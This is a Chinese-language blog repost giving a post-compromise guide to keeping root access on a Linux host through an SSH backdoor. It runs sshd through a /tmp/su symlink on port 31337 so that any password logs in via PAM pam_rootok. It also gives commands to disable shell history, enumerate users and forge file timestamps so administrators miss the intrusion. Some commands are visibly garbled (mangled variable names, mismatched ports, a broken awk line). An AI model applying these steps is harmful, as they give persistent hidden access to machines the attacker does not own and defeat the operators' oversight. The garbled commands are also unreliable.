SSH 维持权限(好用)

SSH 维持权限(好用),第1张

概述很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反dshell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门   1.目的 长期维持机器root权限,同时后门有需要躲避管理检测 通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏等 SSH命令痕迹清除,登陆之后先执行 unset HISTFILE;export

很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反dshell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门

 

1.目的

长期维持机器root权限,同时后门有需要躲避管理检测
通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏等

SSH命令痕迹清除,登陆之后先执行

unset HISTfile;export HISTfileSIZE=0;export HISTIGnorE=*;export HISTCONTRol=ignorespace

每次输入命令前加上空格即可不再history中记录命令

2.后门方式
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
3.使用使用任意密码登录系统后门
ssh root:[email protected] -p 31338
4.查看存在哪些用户
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" { print "|""|" }|more
1 # 如下2 root|0|03 sync|4|655344 MysqL|104|1095 postgres|113|1176 arpwatch|117|1207 Debian-snmp|118|1238 speech-dispatcher|127|299 Debian-gdm|130|138
5.修改上传文件时间戳

touch -r 老文件时间戳 新文件时间戳

6.退出ssh
exit
 注

0.任意密码登陆的核心是auth sufficIEnt pam_rootok.so,只要PAM@R_404_6179@中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM@R_404_6179@除了su还有chsh、chfn1.前提linux软连接连接ssh后门需要ssh配置允许PAM认证才能使用2.被控主机不允许root登录,可用其他已存在用户登录

总结

以上是内存溢出为你收集整理的SSH 维持权限(好用)全部内容,希望文章能够帮你解决SSH 维持权限(好用)所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/1024634.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-23
下一篇 2022-05-23

发表评论

登录后才能评论

评论列表(0条)

保存